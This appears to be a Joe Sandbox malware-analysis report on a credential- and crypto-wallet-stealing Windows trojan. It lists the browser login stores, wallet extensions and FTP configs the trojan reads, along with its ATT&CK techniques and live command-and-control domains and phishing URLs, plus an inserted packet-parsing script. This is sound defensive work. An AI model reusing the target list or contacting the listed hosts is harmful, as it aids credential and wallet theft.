Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla\Notes9.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

      Remote Access Functionality

Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
MITRE ATT&CK Matrix (one line per tactic; the number in parentheses is the count shown next to a technique in the report, techniques without a number had no matched signatures)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation (1); PowerShell (1); At; Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (411); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion (12); Process Injection (411); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (3); DLL Side-Loading (1); Steganography
Credential Access: OS Credential Dumping (2); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: System Time Discovery (1); Security Software Discovery (151); Virtualization/Sandbox Evasion (12); Process Discovery (1); File and Directory Discovery (1); System Information Discovery (33)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Screen Capture (1); Archive Collected Data (1); Data from Local System (3); Clipboard Data (2); Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (21); Non-Application Layer Protocol (2); Application Layer Protocol (113); Protocol Impersonation; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Antivirus Detection (sample)

Source | Detection | Scanner | Label
mkFOY01Gl5.exe | 68% | ReversingLabs | Win32.Trojan.Znyonm
mkFOY01Gl5.exe | 71% | Virustotal |
mkFOY01Gl5.exe | 100% | Avira | HEUR/AGEN.1317026
mkFOY01Gl5.exe | 100% | Joe Sandbox ML |

No Antivirus matches

Antivirus Detection (domains)

Source | Detection | Scanner | Label
potterryisiw.shop | 2% | Virustotal |

Antivirus Detection (URLs)

Source | Detection | Scanner | Label
http://upx.sf.net | 0% | URL Reputation | safe
https://potterryisiw.shop/piR | 100% | Avira URL Cloud | malware
https://potterryisiw.shop/apiA48) | 100% | Avira URL Cloud | malware
https://potterryisiw.shop/t | 100% | Avira URL Cloud | malware
ellaboratepwsz.xyzu | 0% | Avira URL Cloud | safe
https://potterryisiw.shop/pi | 100% | Avira URL Cloud | malware
https://potterryisiw.shop/api | 100% | Avira URL Cloud | malware
towerxxuytwi.xyzd | 0% | Avira URL Cloud | safe
foodypannyjsud.shop | 100% | Avira URL Cloud | malware
pedestriankodwu.xyz | 100% | Avira URL Cloud | malware
contintnetksows.shop | 100% | Avira URL Cloud | malware
https://potterryisiw.shop/api | 14% | Virustotal |
potterryisiw.shop | 100% | Avira URL Cloud | malware
https://potterryisiw.shop/(q | 100% | Avira URL Cloud | malware
penetratedpoopp.xyz | 100% | Avira URL Cloud | malware
foodypannyjsud.shop | 2% | Virustotal |
potterryisiw.shop | 2% | Virustotal |
https://potterryisiw.shop/lli | 100% | Avira URL Cloud | malware
swellfrrgwwos.xyz | 100% | Avira URL Cloud | malware
pedestriankodwu.xyz | 1% | Virustotal |
https://potterryisiw.shop/ | 100% | Avira URL Cloud | malware
https://potterryisiw.shop/api44 | 100% | Avira URL Cloud | malware
swellfrrgwwos.xyz | 1% | Virustotal |
https://potterryisiw.shop/ | 0% | Virustotal |
penetratedpoopp.xyz | 1% | Virustotal |
contintnetksows.shop | 2% | Virustotal |
Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
potterryisiw.shop | 188.114.96.3 | true | true | | unknown

Domains and URLs from malware configuration and memory

Name | Malicious | Antivirus Detection | Reputation
ellaboratepwsz.xyzu | true | Avira URL Cloud: safe | unknown
https://potterryisiw.shop/api | false | 14% Virustotal; Avira URL Cloud: malware | unknown
towerxxuytwi.xyzd | true | Avira URL Cloud: safe | unknown
foodypannyjsud.shop | true | 2% Virustotal; Avira URL Cloud: malware | unknown
pedestriankodwu.xyz | true | 1% Virustotal; Avira URL Cloud: malware | unknown
contintnetksows.shop | true | 2% Virustotal; Avira URL Cloud: malware | unknown
potterryisiw.shop | true | 2% Virustotal; Avira URL Cloud: malware | unknown
penetratedpoopp.xyz | true | 1% Virustotal; Avira URL Cloud: malware | unknown
swellfrrgwwos.xyz | true | 1% Virustotal; Avira URL Cloud: malware | unknown

URLs found in process memory

Name | Source | Malicious | Antivirus Detection | Reputation
https://potterryisiw.shop/apiA48) | RegAsm.exe, 00000004.00000002.2574481805.0000000000C10000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://potterryisiw.shop/t | RegAsm.exe, 00000004.00000002.2574481805.0000000000BB3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://potterryisiw.shop/pi | RegAsm.exe, 00000004.00000002.2574481805.0000000000B6A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://potterryisiw.shop/piR | RegAsm.exe, 00000004.00000002.2574481805.0000000000B6A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://upx.sf.net | Amcache.hve.7.dr | false | URL Reputation: safe | unknown
https://potterryisiw.shop/(q | RegAsm.exe, 00000004.00000002.2574481805.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://potterryisiw.shop/lli | RegAsm.exe, 00000004.00000002.2574481805.0000000000B6A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://potterryisiw.shop/ | RegAsm.exe, 00000004.00000002.2574481805.0000000000BB3000.00000004.00000020.00020000.00000000.sdmp; RegAsm.exe, 00000004.00000002.2574481805.0000000000B8F000.00000004.00000020.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: malware | unknown
https://potterryisiw.shop/api44 | RegAsm.exe, 00000004.00000002.2574481805.0000000000C10000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
188.114.96.3 | potterryisiw.shop | European Union | 13335 | CLOUDFLARENETUS | true
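The TCP packet listing later in this report has its per-row fields glued together by the text extraction (timezone, source port, destination port and both addresses run into one token such as CEST49704443192.168.2.5188.114.96.3). The following Python is an added example, not part of the Joe Sandbox report, that recovers the fields from such rows and summarises the sessions to the C2. The split is genuinely ambiguous, so the parser scores every candidate split using two facts taken from the report, the sandbox VM address 192.168.2.5 and the service port 443; the sample rows are copied from the listing.

```python
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Dict, Iterator, List, Tuple

# Rows copied from the TCP packet listing of this report. The extraction glued
# source port, destination port and both IP addresses together after the
# timezone; the parser below undoes that.
SAMPLE_ROWS = [
    "Jul 1, 2024 09:23:35.287076950 CEST49704443192.168.2.5188.114.96.3",
    "Jul 1, 2024 09:23:35.287127018 CEST44349704188.114.96.3192.168.2.5",
    "Jul 1, 2024 09:23:51.063465118 CEST44349704188.114.96.3192.168.2.5",
    "Jul 1, 2024 09:23:51.516469002 CEST49707443192.168.2.5188.114.96.3",
    "Jul 1, 2024 09:23:52.822515011 CEST49708443192.168.2.5188.114.96.3",
]

SANDBOX_IP = "192.168.2.5"          # analysis VM address, as seen in the report
SERVICE_PORTS = {443, 80, 53}        # ports expected on the server side

ROW = re.compile(r"^(?P<ts>.*?[A-Z]{3,4})(?P<rest>\d[\d.]*)$")
OCTET = r"(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)"
IPV4 = re.compile(rf"^{OCTET}(\.{OCTET}){{3}}$")


@dataclass(frozen=True)
class Packet:
    timestamp: str
    sport: int
    dport: int
    src: str
    dst: str


def _ip_splits(tail: str) -> Iterator[Tuple[str, str]]:
    """Yield every way to cut 'A.B.C.DE.F.G.H' into two valid dotted quads."""
    for i in range(7, len(tail) - 6):
        a, b = tail[:i], tail[i:]
        if IPV4.match(a) and IPV4.match(b):
            yield a, b


def _port_splits(digits: str) -> Iterator[Tuple[int, int]]:
    """Yield every way to cut glued port digits into two 16-bit ports."""
    for i in range(1, len(digits)):
        a, b = digits[:i], digits[i:]
        if a.startswith("0") or b.startswith("0"):
            continue
        if int(a) <= 65535 and int(b) <= 65535:
            yield int(a), int(b)


def parse_row(row: str) -> Packet:
    """Recover the fields of one flattened row. Every candidate split is
    scored: +2 if one address is the sandbox VM, +1 if one port is a known
    service port; the highest-scoring candidate wins."""
    m = ROW.match(row.strip())
    if not m:
        raise ValueError(f"unrecognised row: {row!r}")
    ts, rest = m.group("ts"), m.group("rest")
    head, _, ip_tail = rest.partition(".")      # head = ports + first octet
    best, best_score = None, -1
    for n in (1, 2, 3):                         # the first octet has 1-3 digits
        if len(head) <= n:
            break
        port_digits, first_octet = head[:-n], head[-n:]
        for src, dst in _ip_splits(first_octet + "." + ip_tail):
            for sport, dport in _port_splits(port_digits):
                score = 2 * (SANDBOX_IP in (src, dst)) + (sport in SERVICE_PORTS or dport in SERVICE_PORTS)
                if score > best_score:
                    best, best_score = Packet(ts, sport, dport, src, dst), score
    if best is None:
        raise ValueError(f"could not split fields in: {row!r}")
    return best


def summarize_sessions(packets: List[Packet]) -> Dict[int, dict]:
    """Group packets by the sandbox-side ephemeral port and count each direction."""
    sessions: Dict[int, dict] = {}
    for p in packets:
        if p.src == SANDBOX_IP:
            key, server, direction = p.sport, f"{p.dst}:{p.dport}", "to_server"
        else:
            key, server, direction = p.dport, f"{p.src}:{p.sport}", "from_server"
        s = sessions.setdefault(key, {"server": server, "to_server": 0, "from_server": 0,
                                      "first": p.timestamp, "last": p.timestamp})
        s[direction] += 1
        s["last"] = p.timestamp
    return sessions


if __name__ == "__main__":
    for port, s in summarize_sessions([parse_row(r) for r in SAMPLE_ROWS]).items():
        print(port, s)
```

Run against the full listing, the summary shows three client sessions (ports 49704, 49707, 49708) to 188.114.96.3:443, which is the Cloudflare front for potterryisiw.shop; the 16-second gap inside session 49704 between the client's last segment at 09:23:35 and the server's reply at 09:23:51 lines up with the Sleep calls the API Interceptor modified at that time.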
      Joe Sandbox version:40.0.0 Tourmaline
      Analysis ID:1465097
      Start date and time:2024-07-01 09:22:27 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 5m 11s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:14
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:mkFOY01Gl5.exe
      renamed because original name is a hash value
      Original Sample Name:0309dd0131150796ea99b30a62194fae.exe
      Detection:MAL
      Classification:mal100.troj.spyw.evad.winEXE@8/9@2/1
      EGA Information:
      • Successful, ratio: 100%
      HCA Information:
      • Successful, ratio: 98%
      • Number of executed functions: 42
      • Number of non-executed functions: 80
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
      • Excluded IPs from analysis (whitelisted): 52.182.143.212
      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
03:23:50 | API Interceptor | 8x Sleep call for process: RegAsm.exe modified
03:24:11 | API Interceptor | 2x Sleep call for process: WerFault.exe modified
IP context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
188.114.96.3 | cL7A9wGE3w.exe | malicious | DCRat, PureLog Stealer, zgRAT | 445798cm.nyashka.top/ProviderEternalLinephpRequestSecurePacketprocessauthwordpress.php
 | http://www.youkonew.anakembok.de/ | malicious | HTMLPhisher | www.youkonew.anakembok.de/cdn-cgi/challenge-platform/h/g/jsd/r/89b98144d9c843b7
 | hnCn8gE6NH.exe | malicious | DCRat, PureLog Stealer, zgRAT | yenot.top/providerlowAuthApibigloadprotectflower.php
 | 288292021 ABB.exe | malicious | FormBook | www.oc7o0.top/2zff/?Hp=4L8xoD0W4Zo4sy87CvwWXXlmZfhaBYNiZZOBxyE5jHDJEgkxN8cq+PG6NIXzy1XRCqQIvL5VyJCknvUNNLKk6zzmBcbZOQR3Nr9VCMayuUBptQdoGcq8y485hKv0f5POEUdLprTAYpXY&5H=CtUlKhgP42a
 | eiqj38BeRo.rtf | malicious | FormBook | www.liposuctionclinics2.today/btrd/?OR-TJfQ=g2Awi9g0RhXmDXdNu5BlCrpPGRTrEfCXfESYZTVa1wMirmNXITW5szlP5E4EhRYb22U+Mw==&2dc=kvXd-rKHCF
 | Purchase Order -JJ023639-PDF.scr.exe | malicious | AgentTesla, PureLog Stealer | filetransfer.io/data-package/9a4iHwft/download
 | Techno_PO LV12406-00311.xla.xlsx | malicious | Unknown | qr-in.com/cpGHnqq
 | Techno_PO LV12406-00311.xla.xlsx | malicious | Unknown | qr-in.com/cpGHnqq
 | QUOTATION_JUNQTRA031244#U00faPDF.scr.exe | malicious | AgentTesla, PureLog Stealer | filetransfer.io/data-package/ygivXnVx/download
 | NGL 3200-Phase 2- Strainer.exe | malicious | FormBook | www.oc7o0.top/2zff/?oH=4L8xoD0W4Zo4sy87CvwWXXlmZfhaBYNiZZOBxyE5jHDJEgkxN8cq+PG6NIXzy1XRCqQIvL5VyJCknvUNNLKk7xznBNrfJyFZcb5vCPyKuUBo+l90Wdia8Y821KfsfreAbg==&ML=uVzXijwPkXTxAbN

Domain context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
potterryisiw.shop | 1719520929.094843_setup.exe | malicious | LummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, Vidar | 188.114.96.3

ASN context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | yUFX4wGvLW.elf | malicious | Mirai, Moobot | 172.65.156.147
 | https://yagyatech.com/netpaymem | malicious | Unknown | 172.64.155.119
 | Kh7W85ONS7.exe | malicious | AsyncRAT, DarkTortilla, StormKitty, WorldWind Stealer | 104.16.185.241
 | fPqdDUeLwj.elf | malicious | Mirai, Moobot | 1.4.38.60
 | AGREEMENT AND APPROVAL REPORT AERODYNE- RN & FR OF 2024-50254_6.5.24.pdf | malicious | HTMLPhisher | 172.67.159.201
 | 92s4OjHVFf.exe | malicious | LummaC | 188.114.97.3
 | scan19062024.exe | malicious | FormBook | 172.67.205.232
 | Leadership Development.html | malicious | HTMLPhisher | 104.17.24.14
 | Electronic Slip_ball.com.html | malicious | HTMLPhisher | 188.114.96.3
 | 6Z4Q4bREii.exe | malicious | DCRat, PureLog Stealer, zgRAT | 188.114.97.3

JA3 fingerprint context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | 92s4OjHVFf.exe | malicious | LummaC | 188.114.96.3
 | SecuriteInfo.com.Win32.Malware-gen.371.3693.exe | malicious | Unknown | 188.114.96.3
 | SecuriteInfo.com.Win32.Malware-gen.371.3693.exe | malicious | Unknown | 188.114.96.3
 | Plata.docx.doc | malicious | Unknown | 188.114.96.3
 | 163.exe | malicious | Unknown | 188.114.96.3
 | https://sites.google.com/view/zinkfoodservicegroupinc/home | malicious | HTMLPhisher | 188.114.96.3
